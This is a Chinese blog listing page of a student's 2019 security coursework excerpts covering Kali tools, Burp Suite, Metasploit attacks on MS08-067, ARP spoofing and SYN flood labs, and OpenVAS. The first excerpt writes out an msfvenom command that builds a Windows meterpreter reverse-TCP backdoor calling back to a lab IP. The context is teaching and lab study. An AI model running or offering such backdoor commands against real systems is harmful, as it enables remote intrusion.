摘要: 先在Kali Linux中生成32位Windows的后门shellcode: msfvenom p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=1234 f raw o win_backdoor.raw 接着开启Metasplo 阅读全文
posted @ 2019-05-17 16:05 20189304 阅读(205) 评论(0) 推荐(0) 编辑
摘要: 一、什么是Burpsuite Burpsuite是一款集成型渗透测试工具, 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 二、工具箱 阅读全文
posted @ 2019-05-17 15:02 20189304 阅读(134) 评论(0) 推荐(0) 编辑
摘要: 一、冯·诺依曼体系结构与图灵机 冯·诺依曼体系结构 冯·诺伊曼结构(英语:Von Neumann architecture),也称冯·诺伊曼模型(Von Neumann model)或普林斯顿结构(Princeton architecture),是一种将程序指令存储器和数据存储器合并在一起的计算机设 阅读全文
posted @ 2019-05-05 22:11 20189304 阅读(243) 评论(0) 推荐(0) 编辑
摘要: "码云" kali视频的学习 36.Kali压力测试工具 压力测试通过确定一个系统的瓶颈或者不能接受的性能点,来获得系统能够提供的最大的服务级别的测试。通俗地讲,压力测试是为了测试应用程序的性能会变得不可接受。 Kali下压力测试工具包含VoIP压力测试、Web压力测试、网络压力测试及无线压力测试。 阅读全文
posted @ 2019-04-28 14:57 20189304 阅读(174) 评论(0) 推荐(0) 编辑
摘要: "码云" 教材学习总结 1.1 linux操作系统基本框架概述 发展出众多操作系统发行版:ubuntu、debian、fedora、centos、rhel、opensuse和stackware等。 优势 开放源代码与免费 跨平台的硬件支持 丰富的软件支持 多用户多任务 可靠的安全性 良好的稳定性 完 阅读全文
posted @ 2019-04-20 18:43 20189304 阅读(220) 评论(0) 推荐(0) 编辑
摘要: "码云" 一、课堂测试——windows攻击 使用Metaspoit攻击MS08 067,提交正确得到远程shell过程的截图 五个kali视频的学习 26.KaliSecurity 漏洞利用之检索与利用 searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp。 searchsplo 阅读全文
posted @ 2019-04-14 19:09 20189304 阅读(240) 评论(0) 推荐(0) 编辑
摘要: "码云" 教材第四章的实验 以SEED为攻击机,以Linux Metasploitable/Windows Metasploitable做靶机完成TCP/IP协议攻击。任选两个攻击:ARP缓存欺骗攻击,SYN Flood攻击。 A:攻击者seed ip: 192.168.200.15 mac: 00 阅读全文
posted @ 2019-03-31 19:37 20189304 阅读(269) 评论(0) 推荐(0) 编辑
摘要: TCP/IP简介 虽然大家现在对互联网很熟悉,但是计算机网络的出现比互联网要早很多。 计算机为了联网,就必须规定通信协议,早期的计算机网络,都是由各厂商自己规定一套协议,IBM、Apple和Microsoft都有各自的网络协议,互不兼容,这就好比一群人有的说英语,有的说中文,有的说德语,说同一种语言 阅读全文
posted @ 2019-03-23 12:23 20189304 阅读(306) 评论(0) 推荐(0) 编辑
摘要: "码云" 5个Kali视频学习(11 15) 11.openvas的使用 在网上也看到了一篇比视频中讲的更详细的教程 "openvas的使用高级向导" 在命令行输入openvas start启动openvas 点击configuration里的targets建立漏洞分析目标,名字随意,目标主机的ip 阅读全文
posted @ 2019-03-19 23:00 20189304 阅读(217) 评论(0) 推荐(0) 编辑
摘要: "码云链接" 一、115页作业 1.通过百度搜索引擎搜索20189304李小涛 从上可以看出还是没有泄露多少信息的,比较安全 通过历史纪录可以查看自己曾经的访问记录,如果别人使用我们的电脑,就很容易获取我们的足迹,即使删除记录,以及cookie删除了本地的访问记录,但是我们访问的服务器的后台依然有我 阅读全文
posted @ 2019-03-17 22:47 20189304 阅读(235) 评论(0) 推荐(0) 编辑